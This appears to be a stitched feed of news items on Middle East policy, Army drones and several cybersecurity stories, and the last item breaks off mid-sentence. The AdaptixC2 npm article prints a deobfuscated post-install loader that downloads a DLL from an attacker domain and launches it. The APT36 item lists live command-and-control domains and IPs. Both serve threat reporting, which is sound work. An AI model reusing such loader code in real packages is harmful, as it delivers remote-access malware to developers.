• To seal the recent Gaza peace deal, President Donald Trump asked Arab states to, once again, find a compromise with Israel. Despite Trump’s promises to the contrary, they had to accept seriously watered-down language on a future Palestinian state and a partial, rather than full, Israeli withdrawal from Gaza. Coming on the heels of Israel’s missile strike on Doha that also rattled Arab states, Trump may now feel all the more pressure to appease the United States’ Arab partners, like he did last month when he offered a formal security guarantee to Qatar (a first for any state in the Middle East) to quiet Arab doubts about U.S. reliability as a security partner. 

    Are more U.S. pledges now on the way?

    Saudi Arabia is pushing for a U.S. security deal, but taking on new commitments isn’t worth the real and potential costs to U.S. interests. Instead, Trump needs to stay focused on the heart of the problem and maintain pressure on Israel to curb its regional aggression. Coupled with Arab states shouldering the burden of their own security, pressure like this is best for ending conflict in the region.

    The United States has a bad habit of making new commitments to states in the Middle East when it wants to either expand or maintain regional order and peace. New pledges are the goodies Washington hands out to keep everyone in—or sometimes to expand—the fold.

    With the Abraham Accords, for instance, the United States committed sales of F-35 fighter jets, recognition of disputed territories, and financial support to get the United Arab Emirates, Bahrain, Sudan, and Morocco to normalize relations with Israel. Those pledges essentially greased the wheel for greater regional cooperation.

    Encouraging cooperation is a good thing, but not when it comes at the expense of U.S. national security, which the Trump administration must now put front and center as it considers how to manage relations with Arab states today.

    The United States is already overcommitted to the Middle East. It maintains upwards of 50,000 troops there (that’s up by nearly half since Hamas’ October 7 attack on Israel) despite the waning significance of the region to the United States.

    The two main strategic drivers of U.S. deep engagement in the Middle East over the last five decades—oil and terrorism—are no longer major strategic challenges. The U.S. is now a net exporter of oil, meaning it no longer depends on the region’s fossil fuels; and with the defeat of the ISIS caliphate in 2019 and general weakening of al-Qaeda, the terrorism threat can be mostly handled by local actors.

    In short, Washington is giving the Middle East far too much. It shouldn’t now give even more to tamp down frustrations over the Gaza deal and the Doha strike, or more broadly to try to bring some permanent, transformative fix to the troubled region, which appears to be Trump’s greater ambition. Rather than step deeper into the Middle East, Washington needs to step back. 

    Under similar circumstances, President Joe Biden considered giving Saudi Arabia a NATO-like security guarantee to get Riyadh to come onboard with the Abraham Accords. Riyadh asked for the pledge because, similar to Qatar today, the United States provided no military defense of Saudi Arabia after a 2019 attack by Yemen’s Houthi rebels on two Saudi oil refineries. Right on cue, Biden offered up the security pledge to grease the wheels of regional cooperation.

    Trump just followed Biden’s playbook with Qatar—and might follow that playbook again with new security pledges across the region to appease Arab states post-Gaza and expand the Abraham Accords. This makes little sense, given limited U.S. interests in the Middle East; and it runs counter to the Trump administration’s own strategy of shifting forces out of the region to focus attention on Asia and the Western Hemisphere where the United States has far more at stake. More commitments mean the forces stay too to uphold those commitments.

    Trump needs to make clear to the Qataris the limits of this new pledge, and avoid doling out more of them to other Arab partners. This would not only help the United States, but would likely benefit the Middle East too. The U.S. decision not to defend Saudi Arabia militarily after the Houthi attack in 2019 forced Riyadh to recognize that it had to bear more of the burden of its own security. The result? It ended its brutal, costly military operations in Yemen. This isn’t an isolated case. From Iran to post-Assad Syria, we’ve seen other similar instances of peace and stability when the U.S. draws back.

    Trump should also maintain pressure on Tel Aviv (which he finally used to push Israel into the Gaza peace deal) to tone down its regional aggression. As opposed to doling out goodies, this has worked best to calm Middle East tensions of late. Keeping that pressure up now will help tame regional strikes, like Doha, that led Trump to make the pledge to Qatar in the first place.

    In general, Trump can get the regional stability and order he wants in the Middle East by doing less, not more. Stepping back, rather than stepping farther into, the Middle East just makes sense.

    Will Walldorf is a Professor at Wake Forest University and Senior Fellow at Defense Priorities.


  • Cheap, self-driving drones that don’t require a whole fire team to launch them are a cornerstone of the Army’s forthcoming UAS strategy, which will focus on “universal interoperability and autonomy,” according to the service’s top aviator.

    The service’s next generation of drone training and operation will include a new military occupational specialty that merges operators and maintainers, as well as a new advanced course that standardizes training across the force. Right now, they’re looking for software that will enable drones to take orders rather than be flown.

    “You know, gone are the days where a drone operator is actually being a pilot, where they have to be hands on the sticks all the time,” Maj. Gen. Clair Gill said at last week’s AUSA annual meeting in Washington, D.C. “Now we've got autonomous capability where we can even use large language models to tell it what to do — but we basically program it, tell it what to do, and then, you know, the algorithms, in a very disciplined fashion, execute it.”

    Right now, it takes four soldiers to launch a drone ambush, the deputy commanding general of the 101st Airborne Division said, with one flying it, one pulling security, someone carrying the equipment, and someone setting up antennas.

    But “that’s the wrong math,” Brig. Gen. Travis McIntosh said on the same panel. “Let me give you a threshold that's easy to understand: when we can fly drones by command, not by pilot. When your drones can understand commander's intent—that, ladies and gentlemen, is the threshold for AI autonomy to help us.”

    McIntosh’s soldiers recently debuted a homegrown drone dubbed Attritable Battle Field Enabler 101—or ABE, named after the “screaming eagle” mascot of the 101st. Instead of the $2,500-a-pop commercial drones on the market, McIntosh said, his troops are training on this cheaper $740 model.

    Now they need a software program that can fly the drone and help it make decisions about where to drop grenades.

    “We've also laid the foundation today for an uncrewed vehicle control software capability that's able to provide common software interface, common view, if you will, and common control to UAS across the board,” said Brig. Gen. David Phillips, head of the Army’s Program Executive Office for aviation.

    At the same time, Gill said, the Army has finished a draft of its forthcoming UAS strategy.

    Some changes already underway include a new MOS, 15X, that will combine the 15W drone operator and 15E drone maintainer jobs.

    “I can't overstate or underscore enough the cultural shift that had to take place for these 15-series soldiers, because the 15X is designed to be embedded in maneuver elements, so they need to be able to operate in the same capacity as [those] combat arms soldiers standing next to them,” he said.

    Gill’s team at Fort Rucker, Alabama, has also developed what they’re calling the UAS Advanced Lethality Course, where soldiers from backgrounds in infantry, artillery, cyber, Special Forces, armor and more will learn how to operate drones with the Army’s latest doctrine. 

    “We're getting ready to run our second iteration,” he said. “As soon as we get the government going again, we're ready to export that course.”


  • The emergence of the AdaptixC2 post-exploitation framework in 2025 marked a significant milestone in the evolution of attacker toolsets targeting open-source supply chains.

    Positioning itself as a formidable alternative to established tools like Cobalt Strike, AdaptixC2 quickly attracted threat actors seeking agility and stealth in post-exploitation scenarios.

    This October, researchers uncovered its delivery through the npm package registry—a supply chain attack targeting developers and organizations reliant on Node.js modules for critical infrastructure and application development.

    The incident revolved around a deceptive npm package named https-proxy-utils, which mimicked the functionality and naming conventions of widely used legitimate libraries such as http-proxy-agent.

    The threat actors cloned proxy-related features from popular modules, ensuring the malicious package appeared both useful and harmless.

    Upon installation, however, the package executed a post-install script designed to download and deploy the AdaptixC2 agent onto the victim’s system, initiating a stealthy foothold for remote access and broader exploitation.

    Securelist researchers were the first to identify and analyze the AdaptixC2 npm infection, noting both the technical sophistication of the attack and its alarming implications for open-source threat landscapes.

    As the npm ecosystem grows, attackers are increasingly exploiting its trust and wide reach. The discovery highlights the persistent risk posed by supply chain attacks, emphasizing the need for vigilant vetting and continuous monitoring of open-source components.

    Infection Mechanism: OS-Specific Adaptation

    A standout feature of the AdaptixC2 npm campaign is its tailored infection strategy for multiple operating systems. Once the malicious package executes, it detects the host OS and deploys the payload using methods designed for Windows, macOS, or Linux.

    For Windows, the code sideloads the agent as a DLL alongside a legitimate executable, using JavaScript scripting to spawn the compromised process.

    Metadata for the malicious (left) and legitimate (right) packages (Source – Securelist)

    Below is a deobfuscated snippet employed for Windows deployment:

    async function onWindows() {
      const url = 'https://cloudcenter.topsysupdate';
      const dllPath = 'C:\\.dll';
      const systemMsdtc = 'C:\\32.exe';
      const tasksMsdtc = 'C:\\.exe';
      try {
        await downloadFile(url, dllPath);
        fs.copyFileSync(systemMsdtc, tasksMsdtc);
        const child = spawn(tasksMsdtc, [], { detached: true, stdio: 'ignore' });
        child.unref();
      } catch (err) {
        console.error(err);
      }
    }

    This flexible approach extends across macOS and Linux systems, employing autorun configuration and architecture-specific binary delivery to ensure persistent control.

    Such OS-targeted infection routines deepen the framework’s ability to evade conventional detection, broadening its scope for exploitation across diverse environments.
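
    A defensive check for the pattern described above, where a look-alike package relies on an install-time script: this is an added example, not code from Securelist or the original article. The function names, the `KNOWN_GOOD` list, the token-overlap heuristic and the sample manifests are all assumptions made for illustration.

```javascript
// Lifecycle hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Packages the project really depends on (assumption: maintained by the reader).
const KNOWN_GOOD = ['http-proxy-agent', 'https-proxy-agent'];

// Split a package name into comparable tokens: drop the scope, lower-case,
// and fold "https" into "http" so both spellings compare equal.
function nameTokens(name) {
  return name
    .replace(/^@[^/]+\//, '')
    .toLowerCase()
    .split(/[-_.]+/)
    .filter(Boolean)
    .map((t) => (t === 'https' ? 'http' : t));
}

// Return the known-good name that `name` imitates, or null.
// Heuristic (hypothetical): at least two shared tokens, and at most one
// token of the known-good name missing from the candidate.
function lookalikeOf(name, knownGood) {
  if (knownGood.includes(name)) return null;
  const candidate = new Set(nameTokens(name));
  for (const good of knownGood) {
    const goodTokens = nameTokens(good);
    const shared = goodTokens.filter((t) => candidate.has(t)).length;
    if (shared >= 2 && shared >= goodTokens.length - 1) return good;
  }
  return null;
}

// Audit one package.json (as text). Malformed input is reported, not thrown.
function auditManifest(manifestText, knownGood = KNOWN_GOOD) {
  let manifest;
  try {
    manifest = JSON.parse(manifestText);
  } catch {
    return { name: null, hooks: [], lookalike: null, severity: 'review',
             note: 'unparseable package.json' };
  }
  const name = typeof manifest.name === 'string' ? manifest.name : '(unnamed)';
  const scripts = manifest.scripts && typeof manifest.scripts === 'object'
    ? manifest.scripts : {};
  // Keep only install-time hooks that actually carry a command.
  const hooks = INSTALL_HOOKS.filter(
    (h) => typeof scripts[h] === 'string' && scripts[h].trim() !== ''
  );
  const lookalike = lookalikeOf(name, knownGood);
  let severity = 'ok';
  if (hooks.length > 0 || lookalike) severity = 'review';
  if (hooks.length > 0 && lookalike) severity = 'high';
  return { name, hooks, lookalike, severity };
}

// Audit many manifests and return only the ones that need attention.
function auditAll(manifestTexts, knownGood = KNOWN_GOOD) {
  return manifestTexts
    .map((text) => auditManifest(text, knownGood))
    .filter((result) => result.severity !== 'ok');
}

// Constructed sample input: versions and script commands are invented here,
// only the two package names come from the article.
const SAMPLE_MANIFESTS = [
  JSON.stringify({ name: 'https-proxy-utils', version: '0.0.0',
                   scripts: { postinstall: 'node setup.js' } }),
  JSON.stringify({ name: 'http-proxy-agent', version: '0.0.0',
                   scripts: { test: 'mocha' } }),
  JSON.stringify({ name: 'example-native-addon', version: '0.0.0',
                   scripts: { install: 'node-gyp rebuild' } }),
  '{ not json',
];

console.log(JSON.stringify(auditAll(SAMPLE_MANIFESTS), null, 2));
```

    In a real pipeline the manifest text would come from each `package.json` under `node_modules`; installing with npm's `--ignore-scripts` option keeps these hooks from running until the flagged packages have been reviewed.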


    The post Threat Actors Leverage npm Ecosystem to Deliver AdaptixC2 Post-Exploitation Framework appeared first on Cyber Security News.


  • A sophisticated phishing campaign orchestrated by Pakistan-linked threat actors has been discovered targeting Indian government entities by impersonating the National Informatics Centre’s email services.

    The operation, attributed to APT36, also known as TransparentTribe, leverages social engineering tactics to compromise sensitive government infrastructure through deceptive email communications designed to appear as legitimate NIC eEmail Services correspondence.

    The campaign employs carefully crafted phishing lures that mimic official government communication channels, exploiting the trust associated with NIC’s established email infrastructure.

    By masquerading as authentic government correspondence, the threat actors aim to trick officials into divulging credentials or downloading malicious payloads.

    This targeting strategy demonstrates the group’s deep understanding of Indian government communication protocols and their continued focus on intelligence gathering operations against Indian administrative and defense sectors.

    Cyber Team analysts identified the malicious infrastructure supporting this campaign, uncovering a network of fraudulent domains and command-and-control servers designed to facilitate credential harvesting and data exfiltration.

    The operation represents a continuation of APT36’s long-standing espionage activities against Indian government targets, reflecting the group’s persistent interest in compromising sensitive governmental communications.

    Infrastructure and Technical Indicators

    The attack infrastructure reveals a multi-layered command-and-control framework centered around the fraudulent domain accounts.mgovcloud[.]in.departmentofdefence[.]live, which closely mimics legitimate government cloud services.

    The primary malicious domain departmentofdefence[.]live serves as the foundation for the phishing operation, while IP address 81.180.93[.]5 operates as a stealth server with C2 functionality accessible on port 8080.

    Additional infrastructure includes IP 45.141.59[.]168, providing redundancy and resilience to the adversary’s command-and-control network.

    This sophisticated setup enables the threat actors to maintain persistent access while evading detection through a distributed infrastructure that complicates attribution and takedown efforts.


    The post Pakistani Threat Actors Targeting Indian Govt. With Email Mimic as ‘NIC eEmail Services’ appeared first on Cyber Security News.


  • Cybersecurity is not just about defense; it is about protecting profits. Organizations without modern threat intelligence (TI) face escalating breach costs, wasted resources, and operational inefficiencies that hit the bottom line.

    Actionable intel can help businesses cut costs, optimize workflows, and neutralize risks before they escalate.​

    Security operations centers (SOCs) suffer from inefficiency and burnout without high-fidelity TI. Analysts manually sift through thousands of alerts, many of which are false positives, wasting time and budgets while overlooking real threats.

    This reactive chaos leads to high turnover, with false positives costing enterprises up to $1.3 million annually in labor alone, and burnout making staff twice as likely to seek new jobs.​

    Undetected threats turn into financial disasters, exploiting visibility gaps and slow responses. Generic TI feeds often miss evasive attacks, allowing breaches to cause downtime, fines, and lost trust.

    The global average breach cost in 2025 is $4.44 million, with U.S. organizations facing $10.22 million, while nearly one in five small and medium-sized businesses (SMBs) could close after a successful attack.​

    Compliance gaps invite fines and legal risks, as regulators demand proactive threat documentation. Without real-time TI, audits reveal shortcomings, triggering penalties like GDPR’s up to 4% of global revenue or €20 million, and HIPAA violations exceeding $1.5 million per incident.​

    Five Strategies for Cost Savings with Threat Intelligence

    TI prevents breaches early through feeds providing real-time data on indicators of compromise (IOCs). ANY.RUN’s Threat Intelligence Feeds deliver actionable intel from over 15,000 SOC investigations, blocking threats at the source and avoiding multimillion-dollar recoveries.

    Preventing Breaches Proactively

    Threat intelligence (TI) stops breaches early by delivering real-time IOC feeds that integrate with firewalls and EDR tools for automated blocking of threats like malicious domains.

    Platforms such as ANY.RUN provide 24 times more IOCs from global SOC data, enabling quick risk isolation and reducing breach likelihood by up to 70% through predictive attacker insights.

    Eliminating False Positive Waste

    TI filters alerts by enriching them with context on threat actors and TTPs, cutting investigation time on benign events and alleviating alert fatigue that wastes 30% of analyst hours.

    ANY.RUN’s TI Lookup prioritizes high-risk threats via SIEM integrations, saving up to 50% in labor by focusing teams on verified dangers rather than noise.​

    Cutting Labor Costs Through Automated Triage

    Automated TI triage uses APIs to connect with SOAR and EDR, providing instant sandbox context to reduce manual escalations and empower junior analysts.

    ANY.RUN’s SDK automates artifact enrichment, minimizing turnover and overtime while boosting SOC capacity by 20-30% without additional hires.​

    Accelerating Response to Limit Damage

    TI speeds incident response with full attack visibility from single IOCs, shortening MTTR by 40-60% through sandbox reports on malware behaviors.

    ANY.RUN’s feeds link to detailed analyses, enabling precise containment that cuts downtime costs—up to $100,000 per hour—and prevents revenue loss from prolonged incidents.​

    Maintaining Up-to-Date Defenses Effortlessly

    Continuous TI updates deliver real-time, 99% unique IOCs with MITRE ATT&CK mappings, automating adaptations to evolving threats like ransomware without manual effort.

    ANY.RUN’s query notifications keep defenses proactive, reducing breach risks by 50% and avoiding costs from outdated static feeds.​

    It eliminates false positive waste by filtering alerts for verified threats. ANY.RUN’s solutions cut noise, saving hours on triage and redirecting budgets to high-impact tasks, reducing alert fatigue that plagues teams.​

    Automated triage lowers labor costs via seamless integrations. ANY.RUN’s API and SDK connect with SIEM, SOAR, and EDR tools, enriching alerts instantly and minimizing escalations, thus avoiding overtime and hiring needs.​

    Faster responses minimize fallout, with TI providing full attack context from sandbox analyses. ANY.RUN’s TI Lookup offers instant IOC enrichment, shortening mean time to respond (MTTR) and limiting downtime losses.​

    Continuous updates future-proof defenses without manual effort. ANY.RUN’s feeds refresh in real time with 99% unique IOCs, integrating MITRE ATT&CK mappings to adapt to evolving threats proactively.​

    An international transport firm battled phishing and malware by adopting ANY.RUN’s TI Lookup for automated tracking of geo-targeted threats and CVEs.

    Custom queries and real-time updates enabled quick rule creation, slashing manual research and boosting detection speed. The result: blocked attacks preemptively, optimized resources, and enhanced proactive defenses against shifting attacker tactics.​

    Threat intelligence like ANY.RUN’s TI Feeds and Lookup transforms security from a cost center into a profit protector.


    The post How Threat Intelligence Can Save Money and Resources for Businesses appeared first on Cyber Security News.


  • Microsoft has acknowledged a significant authentication problem affecting users of recent Windows versions, stemming from security enhancements in updates released since late August 2025.

    The company detailed how these updates are triggering Kerberos and NTLM failures on devices sharing identical Security Identifiers (SIDs), leading to widespread login disruptions across enterprise networks.

    This issue, now officially documented, highlights the trade-offs between bolstering security and maintaining compatibility in cloned or duplicated systems.​

    Windows Operating Systems Affected

    Affected users on Windows 11 version 24H2, version 25H2, and Windows Server 2025 report a range of frustrating symptoms following the installation of updates like KB5064081 on August 29, 2025, and KB5065426 on September 9, 2025.

    Common issues include repeated credential prompts despite entering valid information, with error messages such as “Login attempt failed,” “Your credentials didn’t work,” or “There is a partial mismatch in the machine ID.”

    Network access breaks down as well, preventing connections to shared folders via IP or hostname and blocking Remote Desktop Protocol (RDP) sessions, even those routed through Privileged Access Management (PAM) tools or third-party software.

    Failover Clustering operations halt with “access denied” errors, complicating high-availability setups in data centers. Event Viewer logs reveal critical clues, including SEC_E_NO_CREDENTIALS in the Security log and Local Security Authority Server Service (lsasrv.dll) Event ID 6167 in the System log, signaling a machine ID mismatch that suggests ticket manipulation or session discrepancies.

    These problems have surfaced prominently in virtual desktop infrastructure (VDI) environments, such as those using Citrix MCS, where multiple machines derived from the same image share SIDs, exacerbating authentication breakdowns during RDP or file sharing.​

    At the heart of this disruption lies a deliberate security upgrade in the updates, which now rigorously verifies SIDs during authentication handshakes to prevent unauthorized access.

    Microsoft explains that duplicate SIDs, often resulting from improper cloning of Windows installations without the Sysprep tool, are no longer tolerated under this new regime.

    Sysprep ensures SID uniqueness, a requirement Microsoft has long recommended for duplicating OS images, but the August updates enforce it more stringently, blocking interactions between affected devices.

    This change aligns with Microsoft’s policy against unsupported disk duplication methods, which can propagate identical SIDs across networks, posing risks in enterprise settings.

    While intended to enhance protection against potential exploits, the enforcement has caught many IT teams off guard, particularly in scenarios involving rapid VM deployments or legacy imaging practices.​

    For immediate relief, IT administrators can deploy a specialized Group Policy to mitigate the authentication blocks, though this requires contacting Microsoft Support for business to obtain it.

    However, Microsoft suggests that the definitive solution involves rebuilding impacted devices using approved cloning procedures that incorporate Sysprep, ensuring each system generates a unique SID.

    Organizations relying on tools like VMware or Citrix for VDI provisioning may need to revise their workflows to comply, potentially delaying updates until imaging processes are updated.

    As of October 21, 2025, no broader patch has been rolled out, but Microsoft continues monitoring reports from affected users. ​


    The post Microsoft Confirms Recent Updates Cause Login Issues on Windows 11 24H2, 25H2, and Windows Server 2025 appeared first on Cyber Security News.


  • Meta announced innovative tools on Tuesday to shield users of Messenger and WhatsApp from scammers. The updates, revealed during Cybersecurity Awareness Month, aim to detect suspicious activity in real-time and empower users with better account protections.

    This comes as scammers increasingly target vulnerable groups, including older adults, through messaging apps and social platforms.

    Since the start of 2025, Meta’s teams have disrupted nearly 8 million accounts linked to global scam centers operating from regions like Myanmar, Laos, Cambodia, the UAE, and the Philippines.

    These networks exploit dating apps, social media, and crypto channels to deceive victims. The FBI’s 2024 Internet Crime Report highlighted the scale of the problem, noting that Americans over 60 lost $4.8 billion to fraud last year alone. Criminals often build trust to compromise accounts, then prey on contacts for further scams.

    Enhanced detection features are key to Meta’s response. On WhatsApp, a new warning now alerts users when sharing their screen during video calls with unknown contacts, a common tactic scammers use to extract sensitive details like bank information or verification codes.

    For Messenger, advanced AI-driven scam detection is in testing: it flags potentially fraudulent messages from new contacts, offers to review chats, and provides tips on blocking or reporting. Users receive details on common schemes and recommended actions if a scam is identified.

    Meta is also promoting passkeys across Facebook, Messenger, and WhatsApp for seamless, biometric logins using fingerprints, faces, or PINs, reducing reliance on vulnerable passwords.

    Security Checkup on Facebook and Instagram reviews settings and suggests updates, while WhatsApp’s Privacy Checkup helps users manage group invites and other privacy options.

    Beyond tools, Meta shared scam trends uncovered with Graphika researchers. Watch for fake home remodeling or debt relief sites luring seniors with phony government benefits via ads on Facebook and Google.

    Fraudulent “money recovery” services mimic the FBI’s IC3 site, while impostor customer support pages hijack brand comments to push refunds through DMs or forms.

    To stay safe, Meta advises caution with unsolicited messages, never sharing personal or financial data, and verifying issues through official channels.

    Families can assist by discussing red flags like urgency or secrecy, and resources from AARP’s Fraud Watch Network or the FTC offer reporting options.

    Meta is deepening collaborations, joining the National Elder Fraud Coordination Center alongside AARP, Amazon, Google, and others to tackle elder fraud through shared intelligence and investigations.

    As part of the Tech Against Scams Coalition, it recently dismantled scam-linked Facebook Groups with Match Group. Globally, initiatives include training Thai seniors on digital literacy and awareness campaigns in Europe and India featuring local creators.

    These efforts underscore Meta’s commitment to evolving defenses against cross-border threats, with ongoing updates to keep users ahead of scammers.


    The post Meta Launches New Tools to Protect Messenger and WhatsApp Users from Scammers appeared first on Cyber Security News.


  • A swarm of Russian drones shut down the electric grid in parts of Ukraine Tuesday, leaving hundreds of thousands without power—a sign of more blackouts to come this winter. Russia has mounted attacks on civilian infrastructure since it first invaded Ukraine in 2022, and such strikes are expected to grow more frequent as temperatures drop in coming weeks and months. 

    What’s new: “Analysts and officials say that this year Moscow has shifted tactics, targeting specific regions and gas infrastructure,” AP reports.

    European leaders back White House stance on Ukraine. Leaders from across Europe, including the European Union, Britain, France, Germany, and Ukraine, penned a joint statement Tuesday, calling for a ceasefire and more pressure on Russia’s economy. “We are all united in our desire for a just and lasting peace, deserved by the people of Ukraine. We strongly support President Trump’s position that the fighting should stop immediately, and that the current line of contact should be the starting point of negotiations,” leaders wrote in the statement issued by the British government. “We must ramp up the pressure on Russia’s economy and its defence industry, until Putin is ready to make peace.” Read the statement, here.

    Asia-Pacific

    AUKUS is back on after a monthslong review by the Pentagon sparked uncertainty. President Donald Trump, who earlier this year appeared not to know about the trilateral deal, assuaged concerns about the submarine deal’s future, saying U.S. production was “full steam ahead” during a meeting with Australian Prime Minister Anthony Albanese on Monday. “They’re building magnificent holding pads for the submarines. It’s going to be expensive. You wouldn’t believe the level of complexity and how expensive it is,” Trump said. Australia has committed billions of dollars for the deal and its alliance is considered critical for stability in the Indo-Pacific region. 

    Minerals deal. The White House and Australia also signed a critical minerals deal, agreeing to put up $1 billion together in the next six months, according to a White House summary of the deal. Albanese said Australia has $8.5 billion in the pipeline for the arrangement and about $50 billion in resources are estimated to be recovered, NBC reported.

    The rare-earth minerals deal comes ahead of a fraught White House meeting with Chinese President Xi Jinping next week. On Oct. 9, China “announced sweeping new rare earth export controls on Thursday, tightening global access to critical raw materials required for computer chips and defense technology,” as the Washington Post put it. One day later, Trump responded with a threat to levy new 100-percent tariffs on Chinese goods, starting Nov. 1 “or earlier.” 

    Trump also threatened to cancel his meeting with Xi, which could be strained further by Taiwan discussions. But the president insisted to reporters that China wasn’t interested in invading Taiwan, but noted the topic would likely come up, Reuters reported. “China doesn't want to do that,” Trump said, per Politico. “We have the best of everything and nobody is going to mess with that…I think we'll end up with a very strong trade deal. Both of us will be happy.”

    Beijing: Hey, the US is spying on us. China accused the National Security Agency of hacking its sensitive systems that keep standard time for defense, finance, and telecommunications sectors. Read more, here.

    Welcome to this Tuesday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Bradley Peniston and Lauren C. Williams. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. This day in 1960 saw the maiden flight of the W2F-1, the prototype for the E-2 Hawkeye carrier-­based airborne early warning aircraft still in service today.

    AI in Europe

    Two European nations embrace AI governance to keep safe. The governments of Estonia and Ukraine are racing ahead to harness artificial intelligence, which they believe is crucial to building societies that can fend off Russian assaults—whether by missiles or denial-of-service attacks, Defense One’s Patrick Tucker reports.

    “Estonia knows what it means to live on the digital frontline. AI gives us an advantage that size alone cannot. This is why we have an AI strategy for defense and a Force Transformation Command within the Estonian Defense Forces. With industry, startups, and the military working side by side, we move from idea to field faster,” Estonian Prime Minister Kristen Michal told an audience of international technology executives and government officials. “Russia’s war has made one thing clear: the side that can integrate technology faster has the advantage. Ukraine has shown it. So, while supporting them in every way, we also learn from them.” This means more than buying AI tools and services, he said: it means completely rethinking governmental structure and function. More details, here.

    Around the US

    NNSA furloughs most of its staff. The Trump administration furloughed 1,400 employees of the National Nuclear Security Administration on Monday as payroll funds ran out and the shutdown entered its third week. “About 400 NNSA employees will continue working without pay to secure the nuclear stockpile and maintain minimum safety conditions,” Federal News Network reported Monday. Energy Secretary Chris Wright: “This has never happened before.” Politico has background, here.

    Border relocation. House Democrats want to know why Homeland Security moved key cyber workers to the border. The Monday letter — led by Rep. James Walkinshaw, D-Va., and also signed by Reps. Suhas Subramanyam, D-Va., Eugene Vindman, D-Va., and Shontel Brown, D-Ohio, along with Del. Eleanor Holmes Norton, D-D.C. — argues that DHS violated the Antideficiency Act when it conducted a reduction in force during the government shutdown. The agency has also moved to reassign Cybersecurity and Infrastructure Security Agency staff to roles within Immigration and Customs Enforcement, the Federal Protective Service and Customs and Border Protection. Get the full story here.

    ICYMI: Many communications satellites don’t encrypt their traffic, study finds. Wired: “With just $800 in basic equipment, researchers found a stunning variety of data—including thousands of T-Mobile users’ calls and texts and even US military communications—sent by satellites unencrypted.” Read on, here.


  • The Cybersecurity and Infrastructure Security Agency (CISA) has issued a high-priority alert about a critical vulnerability in multiple Apple products.

    Tracked as CVE-2022-48503, this unspecified issue in the JavaScriptCore engine could allow attackers to execute arbitrary code simply by processing malicious web content. The flaw affects macOS, iOS, tvOS, Safari, and watchOS, putting millions of users at risk of remote exploitation.

    First disclosed in 2022, the vulnerability has resurfaced in active attacks, according to CISA’s Known Exploited Vulnerabilities (KEV) catalog. Security researchers note that while Apple patched it in subsequent updates, unpatched or end-of-life (EoL) systems remain prime targets.

    “This isn’t just a relic of the past; threat actors are weaponizing old bugs against outdated devices,” said a CISA spokesperson in the advisory.

    The agency emphasized that the vulnerability’s severity stems from its potential for full system compromise, enabling data theft, ransomware deployment, or further malware spread.

    Although no direct ties to ransomware campaigns have been confirmed, the unknown exploitation history underscores the urgency for immediate action.

    Widespread Impact on Apple’s Ecosystem

    The vulnerability’s broad reach spans Apple’s core operating systems and browser. JavaScriptCore, the engine powering Safari and other web rendering in iOS, macOS, tvOS, and watchOS, processes dynamic web elements like scripts and animations.

    An attacker could craft a booby-trapped webpage or email link to trigger the flaw, bypassing traditional defenses. Older devices, such as those running iOS 15 or earlier macOS versions, are particularly vulnerable if they haven’t received updates.

    CISA warns that end-of-service (EoS) products no longer supported by Apple offer no patch path, leaving users exposed indefinitely.

    For cloud-integrated services, CISA references Binding Operational Directive (BOD) 22-01, urging federal agencies and critical infrastructure operators to apply mitigations or retire affected systems.

    Private users face similar risks, especially in hybrid work environments where personal Apple devices handle sensitive data.

    CISA’s directive is clear: Update to the latest vendor-patched versions immediately. Apple released fixes in security updates dating back to early 2023, but users must verify their systems via Settings > General > Software Update.

    If mitigations aren’t feasible, particularly for EoL hardware, the agency advises discontinuing use to avoid exploitation. Network defenders should monitor for anomalous JavaScript activity and enforce endpoint detection rules targeting code execution attempts.

    Recent reports indicate that attacks on Apple platforms are surging by 20% year over year, which makes vigilance non-negotiable. Organizations that delay patches risk cascading breaches, while individuals should prioritize updates to safeguard their digital lives.

    The post CISA Warns of Apple macOS, iOS, tvOS, Safari, and watchOS Vulnerability Exploited in Attacks appeared first on Cyber Security News.


  • Meta on Tuesday said it’s launching new tools to protect Messenger and WhatsApp users from potential scams. To that end, the company said it’s introducing new warnings on WhatsApp when users attempt to share their screen with an unknown contact during a video call so as to prevent them from giving away sensitive information like bank details or verification codes. On Messenger, users can opt to
